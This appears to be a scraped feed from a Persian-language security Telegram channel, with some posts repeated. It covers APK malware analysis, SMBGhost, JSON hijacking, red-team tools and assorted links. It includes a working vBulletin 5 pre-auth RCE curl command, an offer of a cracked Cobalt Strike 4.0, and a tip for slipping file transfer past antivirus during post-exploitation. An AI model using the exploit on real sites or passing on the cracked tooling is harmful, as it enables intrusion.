Security Analysis
تو یه گروهی بودم که یکی از دوستان از این تبلیغاتهای ناگهانی که تلگرامهای غیررسمی میفرستن رو فرستاد با شعار دور زدن فیلترینگ. منم دیدم فرصت خوبیه تا یه نگاهی بندازم ببینم اپلیکیشن چیکار میکنه. عکسی که فرستادم رو مشاهده کنید. سمت راست تلگرام رسمیه و سمت چپ…
لیست دستورات و کارهای انجام شده:
دیکامپایل کردن APK:
-
-
-
-
@securation
دیکامپایل کردن APK:
-
Jadx (jadx app.apk -o ~/Desktop/jadx-out)
مقایسه فایل Manifest با تلگرام اصلی:-
diff resources/AndroidManifest.xml ../jadx-out/resources/AndroidManifest.xml
پیدا کردن آیپی های موجود در برنامه:-
grep -HnroE "\b([0-9]{1,3}\.){3}[0-9]{1,3}\b"
پیدا کردن URL های موجود در برنامه:-
grep -riE "http://|https://|ahr0"
لیست کردن سورس های جدید اضافه شده به برنامه و بررسی دستی آنها.@securation
#smb #smbghost #cve_2020_0796
از آسیب پذیریهای جدیدی که سر و صدا به پا کرده آسیبپذیری SMBGhost با CVE-2020-0796 هست. در پروتکل SMB یک هدر با نام COMPRESSION_TRANSFORM_HEADER وجود داره که شامل 5 هدر فوق میباشد:
- ProtocolId
- OriginalCompressedSegmentSize
- CompressionAlgorithm
- Flags
- Offset/Length
آسیبپذیری مذکور از جایی شروع میشه که فانکشن srv2.sys از جمع دو مقدار OriginalCompressedSegmentSize و Offset/Length برای allocate کردن سایز بافر، بدون چک کردن معتبر بودن این آدرس استفاده میکنه.
برای توضیحات بیشتر پیشنهاد میکنم مطلب زیر رو از Mcafee بخونید
https://www.mcafee.com/blogs/other-blogs/mcafee-labs/smbghost-analysis-of-cve-2020-0796
همچنین اسکنر این آسیبپذیری برای اثبات وجود و عدم وجود در سیستم رو میتونید از لینک زیر دریافت کنید:
https://github.com/ollypwn/SMBGhost
@securation
از آسیب پذیریهای جدیدی که سر و صدا به پا کرده آسیبپذیری SMBGhost با CVE-2020-0796 هست. در پروتکل SMB یک هدر با نام COMPRESSION_TRANSFORM_HEADER وجود داره که شامل 5 هدر فوق میباشد:
- ProtocolId
- OriginalCompressedSegmentSize
- CompressionAlgorithm
- Flags
- Offset/Length
آسیبپذیری مذکور از جایی شروع میشه که فانکشن srv2.sys از جمع دو مقدار OriginalCompressedSegmentSize و Offset/Length برای allocate کردن سایز بافر، بدون چک کردن معتبر بودن این آدرس استفاده میکنه.
برای توضیحات بیشتر پیشنهاد میکنم مطلب زیر رو از Mcafee بخونید
https://www.mcafee.com/blogs/other-blogs/mcafee-labs/smbghost-analysis-of-cve-2020-0796
همچنین اسکنر این آسیبپذیری برای اثبات وجود و عدم وجود در سیستم رو میتونید از لینک زیر دریافت کنید:
https://github.com/ollypwn/SMBGhost
@securation
McAfee Blog
SMBGhost – Analysis of CVE-2020-0796 | McAfee Blog
The Vulnerability The latest vulnerability in SMBv3 is a “wormable” vulnerability given its potential ability to replicate or spread over network shares
#json #json_hijacking #hijacking #api
یکی دیگه از آسیبپذیریهای کمتر شناخته شده، آسیبپذیری Json Hijacking میباشد. به موجب این آسیبپذیری نفوذگر میتواند مقادیر بازگشتی Json را بدون اینکه نیاز به وجود آسیبپذیری CORS باشد بخواند. این آسیبپذیری در صورتی رخ میدهد که امکان ارسال درخواست با متد GET وجود داشته باشد. البته اگر خروجی Json هم اطلاعات حساسی نباشد میتوان این آسیبپذیری را نادیده گرفت زیرا اطلاعات ارزشمندی در اختیار ما قرار نخواهد داد.
به منظور اکسپلویت این آسیبپذیری کافیست یک صفحه HTML ساخته و API را در تگ noscript آدرسدهی کرد. سپس با استفاده از
به مقدار آن دسترسی پیدا کرد. حال کافیست نفوذگر شخص قربانی را به صفحهی نوشته شده توسط نفوذگر هدایت کند تا مقدار حیاتی را به سرقت ببرد.
برای اطلاعات بیشتر میتوانید از لینک زیر کمک بگیرید:
https://haacked.com/archive/2009/06/25/json-hijacking.aspx
@securation
یکی دیگه از آسیبپذیریهای کمتر شناخته شده، آسیبپذیری Json Hijacking میباشد. به موجب این آسیبپذیری نفوذگر میتواند مقادیر بازگشتی Json را بدون اینکه نیاز به وجود آسیبپذیری CORS باشد بخواند. این آسیبپذیری در صورتی رخ میدهد که امکان ارسال درخواست با متد GET وجود داشته باشد. البته اگر خروجی Json هم اطلاعات حساسی نباشد میتوان این آسیبپذیری را نادیده گرفت زیرا اطلاعات ارزشمندی در اختیار ما قرار نخواهد داد.
به منظور اکسپلویت این آسیبپذیری کافیست یک صفحه HTML ساخته و API را در تگ noscript آدرسدهی کرد. سپس با استفاده از
Object.prototype.__defineSetter__("key of the sensitive value")به مقدار آن دسترسی پیدا کرد. حال کافیست نفوذگر شخص قربانی را به صفحهی نوشته شده توسط نفوذگر هدایت کند تا مقدار حیاتی را به سرقت ببرد.
برای اطلاعات بیشتر میتوانید از لینک زیر کمک بگیرید:
https://haacked.com/archive/2009/06/25/json-hijacking.aspx
@securation
👍1
Forwarded from Security Analysis
cobaltstrike4.0-Fixed.zip
24.4 MB
#CobaltStrike #Cobalt_Strike #RedTeam
دوستانی که در حوزهی Red Team فعالیت میکنن حتما با ابزار Cobalt Strike آشنایی دارن. این ابزار یک فریمورک قدرتمند برای Post-Exploitation هست که آخرین نسخه اون یعنی 4 رو به صورت کاملا کرک شده قرار دادهایم.
دوستانی که در حوزهی Red Team فعالیت میکنن حتما با ابزار Cobalt Strike آشنایی دارن. این ابزار یک فریمورک قدرتمند برای Post-Exploitation هست که آخرین نسخه اون یعنی 4 رو به صورت کاملا کرک شده قرار دادهایم.
Web Based Command Control Framework (C2) #C2 #PostExploitation #CommandControl #RedTeam #C2Framework #PHPC2 #.NETMalware #Malware #PHPMalware #CnC #infosec #offensivesecurity #Trojan
https://github.com/EnginDemirbilek/NorthStarC2
@securation
https://github.com/EnginDemirbilek/NorthStarC2
@securation
GitHub
GitHub - eng1ndes/NorthStarC2: Web Based Command Control Framework (C2) #C2 #PostExploitation #CommandControl #RedTeam #C2Framework…
Web Based Command Control Framework (C2) #C2 #PostExploitation #CommandControl #RedTeam #C2Framework #PHPC2 #.NETMalware #Malware #PHPMalware #CnC #infosec #offensivesecurity #Trojan - eng1ndes/Nor...
قطعا خیلی از سازمان ها از اخرین تکنولوژی ها مانند ngfw ها و بهترین edr ها استفاده کرده اند. اما سوال این است آیا برای امن سازی پورت ۹۱۰۰ کاری انجام داده اید؟
این پورت مربوط به پرینترهای Officejet pro شرکت HP است که در صورتی که در شبکه خود دارید یا علاقه مند به دانستن خطرات باز بودن این پورت هستید خواندن مقاله زیر خالی از لطف نیست! 😃
“HP Officejet pro Printers dork by Rapidsafeguard”
https://link.medium.com/Csu2KxbLm7
این پورت مربوط به پرینترهای Officejet pro شرکت HP است که در صورتی که در شبکه خود دارید یا علاقه مند به دانستن خطرات باز بودن این پورت هستید خواندن مقاله زیر خالی از لطف نیست! 😃
“HP Officejet pro Printers dork by Rapidsafeguard”
https://link.medium.com/Csu2KxbLm7
Medium
HP OfficeJet Pro Printers dork by Rapidsafeguard
Printer cyber attack
A new pre-auth 0day RCE exploit for vBulletin 5:
https://blog.exploitee.rs/2020/exploiting-vbulletin-a-tale-of-patch-fail/
POC: curl -s http://SITE/ajax/render/widget_tabbedcontainer_tab_panel -d 'subWidgets[0][template]=widget_php&subWidgets[0][config][code]=echo%20shell_exec("id"); exit;'
#web #expdev #rce #0day #darw1n @securation
https://blog.exploitee.rs/2020/exploiting-vbulletin-a-tale-of-patch-fail/
POC: curl -s http://SITE/ajax/render/widget_tabbedcontainer_tab_panel -d 'subWidgets[0][template]=widget_php&subWidgets[0][config][code]=echo%20shell_exec("id"); exit;'
#web #expdev #rce #0day #darw1n @securation
رایت آپ کشف آسیب پذیری RCE و آنلاک مودم/روتر Seowon Slc-130
https://virgool.io/@maj0rmil4d/رایت-آپ-کشف-آسیب-پذیری-در-مودمروتر-seowon-slc-130-iggc9ij95vxz
@securation
https://virgool.io/@maj0rmil4d/رایت-آپ-کشف-آسیب-پذیری-در-مودمروتر-seowon-slc-130-iggc9ij95vxz
@securation
ویرگول
رایت آپ کشف آسیب پذیری RCE و آنلاک مودم/روتر های Seowon Slc-130 و SLR-120S
سلام ، با رایت آپ کشف RCE از روتر Seowon Slc-130 در خدمتتون هستیم .
Fuzzing JavaScript Engines with Aspect-preserving Mutation
https://github.com/sslab-gatech/DIE
#reverse #expdev #fuzzing #javanoscript @securation
https://github.com/sslab-gatech/DIE
#reverse #expdev #fuzzing #javanoscript @securation
GitHub
GitHub - sslab-gatech/DIE: Fuzzing JavaScript Engines with Aspect-preserving Mutation
Fuzzing JavaScript Engines with Aspect-preserving Mutation - sslab-gatech/DIE
Content-Type Research
Did you know that browsers support multiple Content-Type in HTTP response header?
https://github.com/BlackFan/content-type-research
#web #appsec #bugbounty #evasion @securation
Did you know that browsers support multiple Content-Type in HTTP response header?
https://github.com/BlackFan/content-type-research
#web #appsec #bugbounty #evasion @securation
GitHub
GitHub - BlackFan/content-type-research: Content-Type Research
Content-Type Research. Contribute to BlackFan/content-type-research development by creating an account on GitHub.
Browser based port scanner triggered via website.
the power of JS !
https://defuse.ca/in-browser-port-scanning.htm
@securation
the power of JS !
https://defuse.ca/in-browser-port-scanning.htm
@securation
defuse.ca
Port Scanning Local Network From a Web Browser
Malicious web pages can port scan your local network.
Cross-Site Scripting (XSS) Cheat Sheet
2020 Edition
Web Security Academy
https://portswigger.net/web-security/cross-site-noscripting/cheat-sheet
@securation
2020 Edition
Web Security Academy
https://portswigger.net/web-security/cross-site-noscripting/cheat-sheet
@securation
portswigger.net
Cross-Site Scripting (XSS) Cheat Sheet - 2025 Edition | Web Security Academy
Interactive cross-site noscripting (XSS) cheat sheet for 2025, brought to you by PortSwigger. Actively maintained, and regularly updated with new vectors.
https://engineering.fb.com/security/pysa/
Pysa: An open source static analysis tool to detect and prevent security issues in Python code
#article #tools #opensource #python #security #staticanalysis
@securation
Pysa: An open source static analysis tool to detect and prevent security issues in Python code
#article #tools #opensource #python #security #staticanalysis
@securation
https://blog.bitsrc.io/how-to-hide-secrets-in-strings-modern-text-hiding-in-javanoscript-613a9faa5787?gi=cce14b3afd96
StegCloak is a pure JavaScript steganography module designed in functional programming style, to hide secrets inside text by compressing and encrypting with Zero Width Characters. It can be used to safely watermark strings, invisible noscripts on webpages, texts on social media or for any other covert communication. Completely invisible!
Live demo :
https://stegcloak.surge.sh/
#tools #steganography #js
@securation
StegCloak is a pure JavaScript steganography module designed in functional programming style, to hide secrets inside text by compressing and encrypting with Zero Width Characters. It can be used to safely watermark strings, invisible noscripts on webpages, texts on social media or for any other covert communication. Completely invisible!
Live demo :
https://stegcloak.surge.sh/
#tools #steganography #js
@securation
https://github.com/leoloobeek/COMRunner
A simple COM server which provides a component to run shellcode. Also includes a Windows JScript file to load the COM server and create the object with registration-free activation. This PoC COM server provides an object with a method that takes in base64 encoded shellcode and a method to run the shellcode.
#tools #opensource #shellcode
@securation
A simple COM server which provides a component to run shellcode. Also includes a Windows JScript file to load the COM server and create the object with registration-free activation. This PoC COM server provides an object with a method that takes in base64 encoded shellcode and a method to run the shellcode.
#tools #opensource #shellcode
@securation
GitHub
GitHub - leoloobeek/COMRunner: A simple COM server which provides a component to run shellcode
A simple COM server which provides a component to run shellcode - leoloobeek/COMRunner
Google Chrome for Android (starting from Chrome 85) now support DNS-over-HTTPS (DoH) feature that, when enabled, can automatically switch to DNS-over-HTTPS if your current DNS provider supports it, or users can also provide a custom server address to prevent miscreants from interfering with domain name lookups, eventually stopping network observers, including your ISPs and attackers, from figuring out what sites you visit.
@securation
@securation
در بسیاری از موارد به هنگام post exploitation آنتی ویروس سرور مثلا nc را trojan میشناسه و حذفش میکنه !
در این مواقع میشه از موارد مشابه استفاده کرد ، مثال زیر یکی از tool هایی هستش که در این زمینه توسعه داده شده :
https://github.com/schollz/croc
Easily and securely send things from one computer to another
@securation
در این مواقع میشه از موارد مشابه استفاده کرد ، مثال زیر یکی از tool هایی هستش که در این زمینه توسعه داده شده :
https://github.com/schollz/croc
Easily and securely send things from one computer to another
@securation
GitHub
GitHub - schollz/croc: Easily and securely send things from one computer to another :package:
Easily and securely send things from one computer to another :crocodile: :package: - GitHub - schollz/croc: Easily and securely send things from one computer to another :package: